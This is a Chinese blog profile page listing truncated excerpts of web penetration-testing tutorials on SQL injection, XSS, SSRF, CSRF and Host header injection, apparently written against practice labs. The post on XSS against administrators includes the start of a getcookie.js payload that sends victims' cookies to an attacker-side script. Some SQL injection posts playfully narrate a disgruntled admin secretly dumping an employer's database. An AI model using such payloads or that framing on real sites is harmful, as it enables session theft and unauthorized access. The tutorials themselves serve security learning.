自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(27)
  • 收藏
  • 关注

原创 Web渗透测试之身份验证:与密码登录相关的漏洞

文章目录前言与密码登录相关的漏洞类型账号破解密码破解如何利用密码登录时的漏洞如何绕过与密码登录相关的防御限制IP锁定账户用户速率限制总结前言  本篇将讲解使用密码登录时可能会存在的漏洞,如何利用这些漏洞,以及在针对这些漏洞进行防御的情况下如何绕过这些防御。与密码登录相关的漏洞类型  既然是密码登录,那就涉及到了账号和密码,那么会产生漏洞的地方就只有两个,分别是账号破解与密码破解。账号破解  关于账号破解这点相对比较简单,现如今基本上使用的是手机账号或者邮箱账号进行登录。而这两样在个人信息中可以说

2021-03-12 20:25:47 853

原创 Web渗透测试之CSRF攻击:初识CSRF

文章目录前言什么是CSRF漏洞CSRF漏洞产生的原因如何利用CSRF漏洞总结前言本篇我们将讲解什么是CSRF漏洞,CSRF漏洞产生的原因,如何什么是CSRF漏洞CSRF漏洞产生的原因如何利用CSRF漏洞总结

2021-03-10 20:59:54 543

原创 Web渗透测试之SSRF攻击:绕过SSRF过滤器

文章目录前言前言

2021-03-09 18:52:38 3095

原创 Web渗透测试之SSRF攻击:初识SSRF

文章目录前言什么是SSRF漏洞SSRF漏洞产生的原因如何利用SSRF总结前言  本篇将初步讲解什么是SSRF漏洞,SSRF漏洞产生的原因以及如何利用简单的SSRF漏洞进行攻击。什么是SSRF漏洞  SSRF全称为Server-side request forgery,中文名为服务端请求伪造。顾名思义SSRF攻击是从服务端入手,假借服务端之手发起伪造请求。那么问题来了,该服务器是向谁发起的请求呢?  我们知道网络有外网与内网之分的。所谓的外网就是公开的、大家都可以访问的网络部分,比如旅游景点的介绍、

2021-03-08 18:50:47 423

原创 Web渗透测试之XSS攻击:基于DOM的XSS

文章目录前言基于DOM的XSS总结前言基于DOM的XSS总结

2021-03-04 20:51:49 6975

原创 Web渗透测试之XSS攻击:针对管理员的XSS攻击

文章目录前言准备工作反射型XSS存储型XSS总结前言  管理员权限的重要性不言而喻,而在渗透测试中如果能够获得管理员权限,无疑将会奠定胜利的基调。本篇将讲述如何利用XSS漏洞冒充管理员,从而达到获得管理员权限的目的。准备工作  在攻击者的服务器端准备脚本执行文件以及cookie获得网页:getcookie.js:var img = document.createElement('img');img.src = "http://127.0.0.1/xss/getcookie.php?COOKIE

2020-12-23 00:15:41 1175

原创 Web渗透测试之XSS攻击:存储型XSS

文章目录前言存储型XSS最简单的存储型XSS利用存储型XSS获得cookie总结前言在了解了反射型XSS相关方面的内容之后,本篇我们将继续深入了解存储型XSS,通过具体的例子讲解存储型XSS攻击的具体流程与危害。存储型XSS在之前的博客中我们提到过,存储型XSS是被包含在之后的HTTP请求响应中的,并且由于存储型XSS是伴随于留言评论等功能存在的,因此存储型XSS能够跟随留言内容一同被存入服务器,并且可以持续发挥作用。我们先来看一个简单的存储型XSS的例子。最简单的存储型XSS我们先在靶场题目提

2020-12-22 22:18:23 2025 4

原创 Web渗透测试之XSS攻击:反射型XSS

文章目录前言反射型XSS最简单的反射型XSS利用反射型XSS获得cookie获得cookie的最简单的方法DNSlog辅助获得cookie总结前言在上一篇博客中我们基本了解了XSS的类型和危害,在本篇中我们将通过具体的例子和讲解,深入理解反射型XSS攻击的具体过程及危害。反射型XSS在上一篇中我们了解到反射型XSS是立即被包含在当前响应的HTTP请求中的,并且具有一次性,接下来我们就来看看一个最简单的反射型XSS例子。最简单的反射型XSS靶场题目首页如下:接着在搜索栏输入一个最简单反射型XS

2020-12-20 22:41:31 3031 1

原创 Web渗透测试之XSS攻击:初识XSS

文章目录前言什么是XSS产生XSS攻击漏洞的原因XSS的类型反射型XSS存储型XSS基于DOM的XSSXSS攻击漏洞的危害冒充受害用户上传木马文件总结前言  本篇将围绕XSS展开,着重介绍什么是XSS,XSS攻击漏洞产生的原因以及XSS的类型,最后简述XSS攻击漏洞造成的危害。什么是XSS  所谓的XSS英文名为Cross-site scripting,翻译过来是跨站点脚本,缩写本应该是CSS,奈何“生不逢时”。由于此CSS容易与前端的CSS冲突,于是只得改为XSS。由跨站点脚本这个中文名也能看出来

2020-12-16 00:21:26 418

原创 Web渗透测试之HTTP头部注入:Host实现密码重置中毒(一)

文章目录

2020-12-13 00:43:05 915

原创 Web渗透测试之HTTP头部注入:Host实现身份验证绕过

文章目录前言题目分析总结前言本篇将讲解在Host参数存在注入漏洞时,如何利用burpsuite修改Host参数实现身份验证绕过并达到我们想要的目的。题目分析题目页面如下:既然要利用Host参数实现注入操作,那么就必须得先确认Host是否存在漏洞。有时为了防止服务器收到无法识别的域名请求,会将服务器配置为后备选项。当服务器设置为后备选项时,即便Host标示的域名不正确也会返回默认的网站。在这种情境下,我们就可以直接修改Host来确认是否可以进行注入。但在大部分情况下,如果直接修改Host,由于H

2020-12-04 22:07:33 2158

原创 Web渗透测试之HTTP头部注入:初识HTTP Host

文章目录前言HTTP Host什么是HTTP Host两种实际场景虚拟主机中介路由系统为什么要使用HTTP HostHTTP Host HeaderHTTP Host Header注入的原理HTTP Host Header注入的危害总结前言本篇将围绕HTTP Host Header展开,讲解了HTTP Host的前世今生以及HTTP Host Header注入的危害,为之后的HTTP头部注入打下基础。HTTP Host什么是HTTP Host从HTTP1.1版本开始,Host成为了HTTP请求的必

2020-12-01 00:13:12 760 1

原创 Web渗透测试之SQL注入:利用修改密码表单获得数据

文章目录前言题目分析SQLMap扫描注入示例总结前言本篇将讲解如何在修改密码时获得数据库中我们想要的信息。题目分析题目页面如下:还是老套路,先提交一个单引号试试:结果如下:可恶,不仅做了过滤,还嘲讽了一顿。照这个情况来看,这个网站的开发人员明显做足了功夫,这个站点很有可能不存在漏洞。但现在放弃还太早了,先用SQLMap扫描一遍再说,说不定就在哪个地方疏忽了呢?SQLMap扫描按照上一篇总结的方法,先用burpsuite抓包(为方便起见,这里以用户名admin为例):保存为txt文

2020-11-29 16:05:00 763

原创 Web渗透测试之SQL注入:基于盲注的登录界面绕过

文章目录前言题目分析burpsuite抓包SQLMap扫描总结前言本篇将讲解如何在无回显不打印错误信息的情况下绕过登录界面并获得数据库中我们想要的信息。题目分析题目页面如下:还是老套路,先尝试提交一个单引号:结果如下:  竟然没有报错信息,莫慌,还有双引号、括号等组合没试呢,都逐个尝试尝试。理想很美好,但都无法触发错误,费时费力不说,目前就连是否存在可注入漏洞都不确定。无奈之下只得掏出了SQLMap这一大利器。  在讲如何使用工具前其实还有一个取巧的方法:符号 + or 1=1 - -

2020-11-23 21:25:03 2665

原创 Web渗透测试之SQL注入:基于错误的登录界面绕过(二)

文章目录前言题目分析登录界面绕过导出数据总结前言该篇与上一篇在绕过登录界面的思想基本一致,不同点在于绕过后获得想要的信息的手段。因此本篇将围绕获取数据的手段展开。题目分析题目页面如下:按照上一篇的套路,先尝试提交一个单引号:结果如下:可以发现页面已经打印出了错误信息,这就很棒。登录界面绕过仔细分析可以发现整个语句大致如下:……username = (’’) and password = (’’)因此闭合符应为(’’),接下来的步骤与上一篇基本一致。先随意构造用户名,再输入语句:’

2020-11-18 21:43:42 424 1

原创 Web渗透测试之SQL注入:基于错误的登录界面绕过(一)

文章目录前言题目分析导出数据总结前言题目分析导出数据总结

2020-11-17 22:24:40 1263

原创 Web渗透测试之SQL注入:盲注特别篇--DNSlog盲注

文章目录前言DNSlog注入原理平台示例总结前言  前两篇依次讲解了布尔盲注和时间盲注,二者本质上并无太大区别。但由于盲注本身的弊端导致在现代渗透测试进行盲注时二者难有用武之地,在盲注中真正发挥作用的是DNSlog盲注。因此本篇将会着重讲解DNSlog盲注。DNSlog注入  在讲解布尔盲注时笔者提到过盲注的关键点就在于一个“盲”字,而产生“盲”的原因就在于页面无回显,这就导致了我们只能通过其它表征(如页面对错、时间差等)来不断猜解拼凑我们想要的信息。因此盲注本身的性质决定了如果进行手工盲注费时费力

2020-11-16 23:14:52 465

原创 Web渗透测试之SQL注入:Level9--时间盲注

文章目录前言题目分析时间盲注时间盲注常用函数示例总结前言  在上一篇我们提到了传统上盲注可由判断注入情况的表征不同可划分为布尔盲注和时间盲注,本篇将围绕时间盲注进行讲解。题目分析题目首页如下:加上单引号结果:相比于上次(Level8),这次加上单引号后既没有打印报错信息,也没有出现异常页面,猜测做了过滤。继续输入双引号:结果同单引号,难道不存在漏洞?无奈只能拿SQLMap扫描确认了。扫描结果如下:确实存在注入漏洞且闭合符为单引号,接下来尝试采用时间盲注进行渗透测试。那什么是时间盲注呢

2020-11-16 16:39:23 199

原创 Web渗透测试之SQL注入:Level8--布尔盲注

文章目录前言题目分析盲注布尔盲注布尔盲注常用函数总结前言题目分析题目页面如下:按照提示输入1,2,3等参数后页面基本一致:输入单引号后虽然出错,但并没有将错误信息打印到页面:输入 'and ‘1’='1 与 'and ‘1’='2 后二者页面不一致,由此可确定确实存在漏洞且闭合符应为单引号:进行到这一步你感到非常憋屈,网站既没有把查询结果直接返回到页面,也没有把错误信息打印出来,这让你引以为傲地联合查询注入和报错注入都失去了用武之地。思来想去,这种情境下只能采用盲注了。但对于盲注,尤其

2020-11-16 12:33:08 266

原创 Web渗透测试之SQL注入:Level7--outfile导出数据并获得webshell

文章目录前言导出数据上传webshell总结前言导出数据上传webshell总结

2020-11-13 00:23:16 448

原创 Web渗透测试之SQL注入:Level6--floor三件套

文章目录前言题目分析floor、count、group by的恩怨情仇总结前言虽然上次你已经获取了数据库里的全部内容,但是并没有找到大宝藏。不过你并没有气馁,这反而激起了你雄雄斗志,现在开始专门在网上找一些挂着中二宣传词的网站,有打着寻宝旗号的,有打着鸡汤励志的,也有打着……你觉得下面这个就很不错,于是熟练的干起了老活计。题目分析首页如下:按提示输入参数id后结果如下:对此你非常淡定,毕竟你也是见过世面的不是?(虽然只见过一次)你非常自信地输入了一个单引号,结果如下:竟然做了过滤,不过

2020-11-10 23:14:04 1242 5

原创 Web渗透测试之SQL注入:Level5--利用XPATH语法错误进行报错注入

文章目录前言题目分析注入原理注入所需函数介绍extractvalue(a,b)updatexml(a,b,c)总结前言题目分析注入原理注入所需函数介绍extractvalue(a,b)updatexml(a,b,c)总结

2020-11-04 22:28:02 447

原创 Web渗透测试之SQL注入:Level4--人与工具

文章目录前言题目分析人与工具总结前言题目分析题目首页如下:  现在的你可以说的上是经验丰富了,看到这你立马输入了一个 ‘ ,但接下来的一幕顿时让你傻眼了,竟然没有报错:  你顿时怀疑是不是哪里出错了,于是又重新输入了一次,结果还是和上次一样,虽然你有所怀疑,但你还是接着尝试输入了 and 1=1 、and 1=2,和 and ‘1’='1 、and ‘1’='2 ,竟然都没有报错:  你现在感到非常的迷惑,为什么都没有报错呢,究竟是哪里出了问题?想来想去你唯一能想到的解释就是网站

2020-11-03 23:20:00 319

原创 Web渗透测试之SQL注入:Level3--闭合与注释

文章目录前言题目分析闭合与注释总结前言在这次拖库过程中你非常幸运的没被其他管理员发现,但在了解了库里内容后你又觉得非常无趣,于是跳槽到了另一家网站做管理员。虽然这次给你的权限同样非常低,但有了前两次的经验,你也就觉得无所谓了。于是趁中午大伙都出去吃饭的空档干起了你的老本行。题目分析闭合与注释总结...

2020-11-02 22:47:07 981

原创 Web渗透测试之SQL注入:Level2--总结对比Level1

前言由于你之前偷看数据库时被其他管理员发现了,于是在被老板叫到办公室臭骂一顿后愤而辞职,到了另一个网站当管理员。非常不幸地是,在这个网站中你的权限也非常低,跟在之前网站的时候没啥区别,那叫一个气人啊。于是在一个月黑风高的晚上,你准备好好招待招待这个数据库。题目分析总结...

2020-10-27 16:11:18 412

原创 Web渗透测试之SQL注入:Level1--初识SQL注入

前言在Web框架技术日益成熟的今天,如正则过滤、字符串过滤等守门人让SQL注入逐渐变得不可能,但笔者坚信,只要是人开发出来的东西,就一定会存在漏洞。正如采用过滤非法字符的方式防范SQL注入一样,SQL注入时也可采用注释、URL编码等方式绕过过滤。只要没有颠覆原有基础知识体系,重新创造出新的结构体系,那么SQL注入与防御技术就会在两者的对抗中不断发展。因此笔者将会采用以解题的方式,模拟SQL注入的过程。正所谓知己知彼,百战不殆,如果明白了SQL注入攻击的方式,无论是对测试人员还是开发人员,都是大有裨益的。

2020-10-24 00:12:31 609

原创 Java多线程(一)

目录Java多线程(一)前言线程与进程概念关系Thread、Runnable、Java多线程(一)前言线程与进程概念关系Thread、Runnable、

2019-12-04 11:48:28 3437 12

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除